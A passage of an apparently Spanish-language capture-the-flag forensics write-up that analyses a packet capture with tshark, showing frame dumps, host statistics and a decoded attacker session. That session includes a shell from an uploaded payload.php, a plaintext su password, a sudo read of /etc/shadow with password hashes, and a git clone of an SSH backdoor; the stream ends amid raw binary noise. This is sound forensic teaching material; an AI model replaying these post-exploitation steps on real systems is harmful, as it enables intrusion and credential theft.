    Urgent Pointer: 0
    Options: (20 bytes), Maximum segment size, SACK permitted, Timestamps, No-Operation (NOP), Window scale
        TCP Option - Maximum segment size: 1460 bytes
            Kind: Maximum Segment Size (2)
            Length: 4
            MSS Value: 1460
        TCP Option - SACK permitted
            Kind: SACK Permitted (4)
            Length: 2
        TCP Option - Timestamps
            Kind: Time Stamp Option (8)
            Length: 10
            Timestamp value: 3256059711: TSval 3256059711, TSecr 0
            Timestamp echo reply: 0
        TCP Option - No-Operation (NOP)
            Kind: No-Operation (1)
        TCP Option - Window scale: 7 (multiply by 128)
            Kind: Window Scale (3)
            Length: 3
            Shift count: 7
            [Multiplier: 128]
    [Timestamps]
        [Time since first frame in this TCP stream: 0.000000000 seconds]
        [Time since previous frame in this TCP stream: 0.000000000 seconds]

Frame 2: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface ens33, id 0
    Section number: 1
    Interface id: 0 (ens33)
        Interface name: ens33
    Encapsulation type: Ethernet (1)
    Arrival Time: Jul 21, 2020 17:33:53.162351706 -03
    [Time shift for this packet: 0.000000000 seconds]
    Epoch Time: 1595363633.162351706 seconds
    [Time delta from previous captured frame: 0.000122542 seconds]
    [Time delta from previous displayed frame: 0.000122542 seconds]
    [Time since reference or first frame: 0.000122542 seconds]
    Frame Number: 2
    Frame Length: 74 bytes (592 bits)
    Capture Length: 74 bytes (592 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp]
Ethernet II, Src: VMware_6e:18:17 (00:0c:29:6e:18:17), Dst: VMware_17:ba:48 (00:0c:29:17:ba:48)
    Destination: VMware_17:ba:48 (00:0c:29:17:ba:48)
        Address: VMware_17:ba:48 (00:0c:29:17:ba:48)
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: VMware_6e:18:17 (00:0c:29:6e:18:17)
        Address: VMware_6e:18:17 (00:0c:29:6e:18:17)
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 192.168.170.159, Dst: 192.168.170.145
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
        0000 00.. = Differentiated Services Codepoint: Default (0)
        .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
    Total Length: 60
    Identification: 0x0000 (0)
    010. .... = Flags: 0x2, Don't fragment
        0... .... = Reserved bit: Not set
        .1.. .... = Don't fragment: Set
        ..0. .... = More fragments: Not set
    ...0 0000 0000 0000 = Fragment Offset: 0
    Time to Live: 64
    Protocol: TCP (6)
    Header Checksum: 0x643a [validation disabled]
    [Header checksum status: Unverified]
    Source Address: 192.168.170.159
    Destination Address: 192.168.170.145
Transmission Control Protocol, Src Port: 80, Dst Port: 47732, Seq: 0, Ack: 1, Len: 0
    Source Port: 80
    Destination Port: 47732
    [Stream index: 0]
    [Conversation completeness: Incomplete, SYN_SENT (1)]
    [TCP Segment Len: 0]
    Sequence Number: 0    (relative sequence number)
    Sequence Number (raw): 3813293411
    [Next Sequence Number: 1    (relative sequence number)]
    Acknowledgment Number: 1    (relative ack number)
    Acknowledgment number (raw): 2491250219
    1010 .... = Header Length: 40 bytes (10)
    Flags: 0x012 (SYN, ACK)
        000. .... .... = Reserved: Not set
        ...0 .... .... = Accurate ECN: Not set
        .... 0... .... = Congestion Window Reduced: Not set
        .... .0.. .... = ECN-Echo: Not set
        .... ..0. .... = Urgent: Not set
        .... ...1 .... = Acknowledgment: Set
        .... .... 0... = Push: Not set
        .... .... .0.. = Reset: Not set
        .... .... ..1. = Syn: Set
            [Expert Info (Chat/Sequence): Connection establish acknowledge (SYN+ACK): server port 80]
                [Connection establish acknowledge (SYN+ACK): server port 80]
                [Severity level: Chat]
                [Group: Sequence]
        .... .... ...0 = Fin: Not set
        [TCP Flags: ·······A··S·]
    Window: 65160
    [Calculated window size: 65160]
    Checksum: 0x004c [unverified]
    [Checksum Status: Unverified]
    Urgent Pointer: 0
    Options: (20 bytes), Maximum segment size, SACK permitted, Timestamps, No-Operation (NOP), Window scale
        TCP Option - Maximum segment size: 1460 bytes
            Kind: Maximum Segment Size (2)
            Length: 4
            MSS Value: 1460
        TCP Option - SACK permitted
            Kind: SACK Permitted (4)
            Length: 2
        TCP Option - Timestamps
            Kind: Time Stamp Option (8)
            Length: 10
            Timestamp value: 894438874: TSval 894438874, TSecr 3256059711
            Timestamp echo reply: 3256059711
        TCP Option - No-Operation (NOP)
            Kind: No-Operation (1)
        TCP Option - Window scale: 7 (multiply by 128)
            Kind: Window Scale (3)
            Length: 3
            Shift count: 7
            [Multiplier: 128]
    [Timestamps]
        [Time since first frame in this TCP stream: 0.000122542 seconds]
        [Time since previous frame in this TCP stream: 0.000122542 seconds]
    [SEQ/ACK analysis]
        [This is an ACK to the segment in frame: 1]
        [The RTT to ACK the segment was: 0.000122542 seconds]

Frame 3: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) on interface ens33, id 0
    Section number: 1
    Interface id: 0 (ens33)
        Interface name: ens33
    Encapsulation type: Ethernet (1)
    Arrival Time: Jul 21, 2020 17:33:53.162441018 -03
    [Time shift for this packet: 0.000000000 seconds]
    Epoch Time: 1595363633.162441018 seconds
    [Time delta from previous captured frame: 0.000089312 seconds]
    [Time delta from previous displayed frame: 0.000089312 seconds]
    [Time since reference or first frame: 0.000211854 seconds]
    Frame Number: 3
    Frame Length: 66 bytes (528 bits)
    Capture Length: 66 bytes (528 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp]
Ethernet II, Src: VMware_17:ba:48 (00:0c:29:17:ba:48), Dst: VMware_6e:18:17 (00:0c:29:6e:18:17)
    Destination: VMware_6e:18:17 (00:0c:29:6e:18:17)
        Address: VMware_6e:18:17 (00:0c:29:6e:18:17)
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: VMware_17:ba:48 (00:0c:29:17:ba:48)
        Address: VMware_17:ba:48 (00:0c:29:17:ba:48)
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)

CONTINUA.......................





VEMOS LAS ESTADISTICAS DE CONECCION A LNUESTRA IP HOST, aparte de las conecciones del la ip atacante , tenemos otra sospechosa: 140.82.118.4 :



┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -z ip_hosts,tree 



=================================================================================================================================
IPv4 Statistics/All Addresses:
Topic / Item      Count         Average       Min Val       Max Val       Rate (ms)     Percent       Burst Rate    Burst Start  
---------------------------------------------------------------------------------------------------------------------------------
All Addresses     3865                                                    0,0134        100%          0,9300        139,353      
 192.168.170.159  3840                                                    0,0133        99,35%        0,9300        139,353      
 140.82.118.4     3228                                                    0,0112        83,52%        0,9300        139,353      
 192.168.170.145  608                                                     0,0021        15,73%        0,4600        229,070      
 192.168.170.1    21                                                      0,0001        0,54%         0,0600        173,637      
 239.255.255.250  14                                                      0,0000        0,36%         0,0100        137,256      
 224.0.0.251      4                                                       0,0000        0,10%         0,0400        173,649      
 192.168.170.2    4                                                       0,0000        0,10%         0,0400        130,813      
 192.168.170.138  4                                                       0,0000        0,10%         0,0200        40,711       
 224.0.0.22       3                                                       0,0000        0,08%         0,0200        173,637      
 91.189.91.157    2                                                       0,0000        0,05%         0,0200        92,969       
 192.168.170.254  2                                                       0,0000        0,05%         0,0200        40,711       

--------------------------------------------------------------------------------------------------------------------------------




VEMOS SOLO EL ENCABEZADO DE ESTA FORMA CON -q y PIPELINE HEAD EN ESTE CASO DE LOS ENDPOINT:





┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -z endpoints,eth0 -q | head
Running as user "root" and group "root". This could be dangerous.
================================================================================
Ethernet Endpoints
Filter:<No Filter>
                       |  Packets  | |  Bytes  | | Tx Packets | | Tx Bytes | | Rx Packets | | Rx Bytes |
VMware_6e:18:17             3843       3753721       1729          185301        2114         3568420   
VMware_f9:85:10             3240       3564469       1771         3475258        1469           89211   
VMware_17:ba:48              610        189696        347           93432         263           96264   
VMware_c0:00:08               42         21154         42           21154           0               0   
IPv6mcast_0c                  14         10052          0               0          14           10052   
IPv4mcast_7f:ff:fa            14          9772          0               0          14            9772  








FILTRAMOS PARA OPTENER MAS INFORMACION ESPECIFICA DE LOS ASCCI DE CADA PAQUUETE, Y VEMOS ETC/SHADOW de JAMES, Y VEMOS MUCHOS COMANDOS EN LIMPIO Y TAMBIEN VEMOS EL PASSWORD EN TEXTO PLANO DE (su james Password: whenevernoteartinstant) MUCHO MAS:





┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -T fields -e data | xxd -r -p   
Running as user "root" and group "root". This could be dangerous.
Upload File/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@overpass-production:/var/www/html/development/uploads$ ls -lAh
ls -lAh
total 8.0K
-rw-r--r-- 1 www-data www-data 51 Jul 21 17:48 .overpass
-rw-r--r-- 1 www-data www-data 99 Jul 21 20:34 payload.php
www-data@overpass-production:/var/www/html/development/uploads$ cat .overpass
cat .overpass
,LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.www-data@overpass-production:/var/www/html/development/uploads$ su james
su james
Password: whenevernoteartinstant

james@overpass-production:/var/www/html/development/uploads$ cd ~
cd ~
james@overpass-production:~$ sudo -l]
sudo -l]
sudo: invalid option -- ']'
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user]
            [command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
            prompt] [-T timeout] [-u user] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
            prompt] [-T timeout] [-u user] file ...
james@overpass-production:~$ sudo -l
sudo -l
[sudo] password for james: whenevernoteartinstant

Matching Defaults entries for james on overpass-production:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on overpass-production:
    (ALL : ALL) ALL
james@overpass-production:~$ sudo cat /etc/shadow
sudo cat /etc/shadow
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
james@overpass-production:~$ git clone https://github.com/NinjaJc01/ssh-backdoor
<git clone https://github.com/NinjaJc01/ssh-backdoor
Cloning into 'ssh-backdoor'...
remote: Enumerating objects: 18, done.        
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope>#Ro>��JN���]�-��N+7,����%y'�=A�AF��f��0����s��
     PJl���<}��jV�����_��o�v�5xi������b�I�KG
                                             B@����@�G����OWg��;�yWŠ'�PQ�'��?���ʦ�x)s���'�,:
                                                                                            P8?�c�PF_q�M9��\�=���Ng���;�u.g�?L�� :��%Z.f)�G��}ց�`���"�J�"{޵� ϶��Y���E�  ��$i��j���rmO{�J�
                                                         ���i������QD6��Uk�/�Ǡ!�m��ʤ_�'��. ���0�"d�귀�J�C���
                                                                                                            ������U�Iq�oǙ
ڬ��}��$#�4�k �r�����^���#;�P������(ٲPU▒���^X�_��Y�A�7�1��3�Ĺ                                                             ��?뺸���
                                                            hZ����xʼn�*CVG�(>�R��jE۱���/▒�T��D����O�m������ɰ�ܧQ�3��o�
                                                                                                                    PP!""�e�Ӹ�8"�-#��d.2)�
        ���mx
             ���j-�d���}73��IX�&m��|?]��~�d��▒[�mQ��~�e�}��%>�vЦ:V��
                                                                    mNvW���;�����]�@4˞�|���m�
)Jo!S�h'��P��,u�V��     �BW_����h��j4�����Be���z���o��PQ��$�zKr���N��b��d�L/ڌ%�'#�������uh��Xz冦�p��I�i�צ�;��R����p�P�P4`����g"�
�#�b�b��J
�N�����#{昆�/9Ѓ���Ō��\�l?M�
�o.��D\▒1{�h��f�           �$�ŵ
                �d��O▒"e������;�(0-g�sD�˴�=`X��������L0����s�ж��&�e��q�^*�Y���r���&��1HW�������!�h�#���, ��m�c�x��x��C
                                                                                                                      al�;+�N.4t��V���l2D�@t����q(�'���
��w�A ��c�嚢:�3�m�蕅q)�8lǕ�
                           M�QKz������+�(^X�=�1���{�\�-���u�|�������%���NP
                                                                          �]������M�Q��5i���,�\�!@��2��=�T��k���e�-b����8:�N��vM���$��.W�����ůǫՏR��S4ފ]���a���$�C���p��my�!�&[�*;���$�
                                                     �mo����Io��r9��}K���8&z���#�k6s�������[R��l�AOftyʔ�t8�Q�ʃw�|>�i��}n▒���f`�l�=�����/▒VI~d�Ԉ  +qE�A6}�.�޹Xtri�R6ğZ���D�hO��蓁�:����o�ߛC������N�H�ha
^z�R���?��۹�Eremote: Total 18 (delta 4), reused 7 (delta 1), pack-reused 0        
Unpacking objects: 100% (18/18), done.
james@overpass-production:~$ <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope>cd ssh-backdoor
cd ssh-backdoor
james@overpass-production:~/ssh-backdoor$ <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" 